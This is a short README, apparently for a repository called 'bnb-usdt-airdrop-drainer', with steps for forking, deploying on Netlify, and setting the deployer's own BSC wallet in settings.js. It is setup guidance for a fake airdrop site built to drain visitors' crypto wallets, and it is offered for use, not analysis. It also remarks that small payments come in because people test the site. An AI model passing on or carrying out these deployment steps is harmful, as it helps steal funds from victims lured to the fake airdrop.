solrac171717/bnb-usdt-airdrop-drainer/README.md

 Instructions on how to start are below ⬇️

               ##########

+            Deploy steps

+!!!!!!
+Make sure you fork it then deploy !!!!!!!

+info on how to fork https://www.youtube.com/watch?v=f5grYMXbAV0

+!!!!!!
+Make sure you add your wallet to settings.js file !!!!!!! this is the settings for smart contract

+1. Go to above link to deploy the code once you fork it

+2. Follow the steps on netlify

+3. deploy

+4. Add your wallet to settings.js file use bsc address

 If you notice small payments made to you thats because most people test the site with small amounts